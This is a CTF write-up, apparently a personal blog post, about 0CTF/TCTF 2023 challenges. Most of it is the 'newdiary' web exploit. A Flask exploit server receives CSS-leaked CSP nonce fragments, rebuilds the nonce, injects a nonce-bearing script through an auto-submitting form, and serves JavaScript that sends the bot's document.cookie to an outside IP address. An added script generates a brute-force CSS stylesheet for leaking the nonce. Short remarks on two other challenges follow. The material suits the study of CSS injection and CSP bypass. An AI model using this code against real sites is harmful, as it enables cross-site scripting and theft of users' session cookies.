I couldn't do the other two web challenges; I'm really bad at this.

newdiary was also solved together with a teammate. At first I thought of leaking two characters per group; after thinking it over, three per group turned out to be more effective.

0CTF/TCTF 2023 newdiary

Brute force all the way! The CSS injection leaks the nonce three characters at a time; once the unordered nonce fragments have arrived, a small algorithm stitches the correct nonce back together.

I wrote yet another new diary website for myself! Wait, someone keeps reporting something to me? Let me create a bot to save my life…

Challenge: http://new-diary.ctf.0ops.sjtu.cn/

Source: https://s3.jcloud.sjtu.edu.cn/962eeeff2d0148c1b17df3c8225da79a-ctf/newdiary_e52f7db7c5864cf32ae33adbe50ba4f4.zip

The original code is from Codegate 2023. The original author in the package.json @as3617 is not involved in this challenge. The solution is completely different so you do not need to worry about not attending the prior competition!

```python
from flask import Flask, request

app = Flask(__name__)


def complete_string(start, fragments):
    # Chain the trigrams: a fragment whose first two characters equal the
    # last two characters of the result so far extends the result by one.
    result = start
    while fragments:
        for i, fragment in enumerate(fragments):
            if fragment[:2] == result[-2:]:
                result += fragment[-1]
                # Remove the fragment that has just been consumed.
                fragments.pop(i)
                break
        else:
            # No fragment continues the chain (a piece never arrived, or the
            # same trigram was reported twice): stop instead of spinning forever.
            break
    print(len(result))
    return result


def find_start(fragments):
    # The head fragment is the one whose first two characters are not the
    # last two characters of any fragment.
    for i, fragment in enumerate(fragments):
        a = True
        for fragment2 in fragments:
            if fragment[:2] == fragment2[-2:]:
                a = False
                break
        if a:
            start = fragment
            fragments.pop(i)
            return start, fragments
    # Every prefix also occurs as a suffix: fall back to the first fragment.
    return fragments.pop(0), fragments


fragments = []
nonce = ""


@app.route('/')
def home():
    # The injected stylesheet hits this endpoint once per matched trigram
    # (?p=abc); a 32-character nonce yields 30 overlapping trigrams.
    global fragments, nonce
    if request.args.get('p'):
        p = request.args.get('p')
        fragments.append(p)
        if len(fragments) == 30:
            start, fragments = find_start(fragments)
            nonce = complete_string(start, fragments)
    return ''


@app.route('/exploit')
def about():
    # Auto-submitting form: makes the bot write a diary entry whose content
    # carries a script tag with the recovered nonce.
    global nonce
    return f'''
<body onload='form.submit()'>
<form id='form' action='http://localhost/write' method='POST'>
<input type='text' name='title' value='exploit'/>
<input name='content' value='<iframe srcdoc="<script nonce={nonce} src=http://8.134.216.221:1234/1.js></script>"></iframe>'>
</form>
</body>
'''


@app.route('/1.js')
def js():
    # Payload that runs in the bot's browser: exfiltrate the cookie.
    return '''
fetch("http://8.134.216.221:1234/flag?flag="+document.cookie)
'''


@app.route('/flag')
def flag():
    print(request.args.get('flag'))
    return 'ok'


@app.route('/start')
def start():
    # Entry page for the bot. Window a opens the shared diary entry that
    # carries the injected stylesheet:
    #   http://localhost/share/read#id=29&username=teltel ->
    #   <link rel="stylesheet" href="https://unpkg.com/[email protected]/1.css">
    # After the trigrams have arrived and the nonce has been reassembled,
    # window b submits the /exploit form, then visits share_diary/0, and
    # finally window a is pointed at the entry with id=0.
    return '''<script>
a = window.open("http://localhost/share/read#id=29&username=teltel");
function leak(){
    b = window.open("http://8.134.216.221:1234/exploit");
    function leak2(){
        b.location = "http://localhost/share_diary/0";
        function leak3() {
            a.location = "http://localhost/share/read#id=0";
        }
        setTimeout(leak3, 3000);
    }
    setTimeout(leak2, 3000);
}
setTimeout(leak, 3000);</script>
'''


if __name__ == '__main__':
    app.run(debug=True, port=1234, host="0.0.0.0")
```
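
The two halves of the technique above, the brute-force stylesheet that reports each matching trigram to the receiver and the reassembly of the unordered trigrams, as an added example that is not part of the original writeup. The writeup does not show its stylesheet, so the selector shape (a `script{display:block}` rule followed by one `script[nonce*="..."]` rule per possible trigram) and the collector URL are assumptions; the nonce length of 32 base64 characters is inferred from the 30 fragments the receiver waits for. Unlike the receiver's greedy chain, this reassembler tries every fragment as the head and backtracks, so it returns every nonce consistent with the fragments (normally exactly one), and an empty set when a fragment never arrived rather than looping forever.

```python
import itertools
import random
import string
from collections import defaultdict
from urllib.parse import quote

# Assumptions (not from the challenge source): CSP nonces are 32 base64
# characters, so 30 overlapping trigrams describe one nonce completely.
NONCE_LEN = 32
B64_ALPHABET = string.ascii_letters + string.digits + "+/"
# Placeholder collector; the writeup's receiver answers on "/?p=<trigram>".
COLLECTOR = "http://127.0.0.1:1234/"


def css_rule(trigram, collector=COLLECTOR):
    """One brute-force rule: if the nonce contains `trigram`, the browser
    requests collector?p=<trigram>. '+' and '/' are percent-encoded, since
    Flask's request.args would otherwise turn '+' into a space."""
    return ('script[nonce*="%s"]{background:url(%s?p=%s)}'
            % (trigram, collector, quote(trigram, safe="")))


def stylesheet(alphabet=B64_ALPHABET, collector=COLLECTOR):
    """Yield the whole stylesheet: one rule per possible trigram (64**3 of
    them) after a rule that makes <script> elements render at all, because
    background images are only fetched for elements that generate a box."""
    yield "script{display:block}"
    for combo in itertools.product(alphabet, repeat=3):
        yield css_rule("".join(combo), collector)


def trigrams(nonce):
    """Overlapping 3-character windows, in order (what the bot leaks)."""
    return [nonce[i:i + 3] for i in range(len(nonce) - 2)]


def reassemble(fragments):
    """Return every string that chains all distinct fragments exactly once,
    each fragment overlapping the previous one by two characters.
    Empty set: a fragment is missing, so no chain closes. More than one
    element: the overlaps are ambiguous and each candidate must be tried."""
    frags = set(fragments)
    by_prefix = defaultdict(list)
    for f in frags:
        by_prefix[f[:2]].append(f)
    solutions = set()

    def walk(current, remaining):
        if not remaining:
            solutions.add(current)
            return
        for nxt in by_prefix[current[-2:]]:
            if nxt in remaining:
                walk(current + nxt[-1], remaining - {nxt})

    # Try every fragment as the head instead of deriving the head from
    # prefix/suffix sets, which fails when the nonce starts with a 2-gram
    # that also occurs later in it.
    for head in frags:
        walk(head, frags - {head})
    return solutions


def demo():
    """Constructed round trip: a fixed nonce, its shuffled trigrams, and the
    candidates recovered from them."""
    nonce = "aB3dE5fG7hI9jK1lM2nO4pQ6rS8tU0vW"  # constructed, not a real nonce
    leaked = trigrams(nonce)
    random.Random(0).shuffle(leaked)          # the bot reports them unordered
    return nonce, reassemble(leaked)


if __name__ == "__main__":
    nonce, candidates = demo()
    print("recovered:", candidates == {nonce})
    print("rules in stylesheet:", sum(1 for _ in stylesheet()))
```

The stylesheet is large (one rule per trigram, 262,144 of them plus the display rule), which is exactly the "brute force" the writeup refers to; it only has to be hosted once and linked from the injected `<link>`. Because a trigram that occurs twice in a nonce fires only one request, `reassemble` works on the set of distinct fragments; for a random 32-character nonce that case is rare, and when it does happen the receiver should simply wait for the next bot visit rather than trust a short candidate.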

olapinfra

Behold! The epitome of stylish Internet infrastructure! Trailing closely behind the likes of LLM, Cloud Native, Web3, low-code platforms, and anything else you can imagine!

(After the instance successfully runs, the service is still in the process of initialization. You may need to wait for >= 1 min before you can attack it. So run it locally before you can get the flag.)

attachment https://s3.jcloud.sjtu.edu.cn/962eeeff2d0148c1b17df3c8225da79a-ctf/olapinfra-69e73ebe082712b26f2a3e63b3d323f17e0a9cbc4647df85f51bd672b67ca168.tar.xz

JDBC JS script RCE? I'm not really used to this kind of challenge where you dig through documentation for something new (though many of the new techniques actually have some old material hidden inside them).

ezjava

Finally, we build our new curl website! We are not afraid. We do not care others. We can live together even on another planet.

In solitude, where we are least alone.

A blind box; I didn't understand it.

I'll come back and finish these challenges later; first I need to revise for finals, and there's a lot of coursework to write.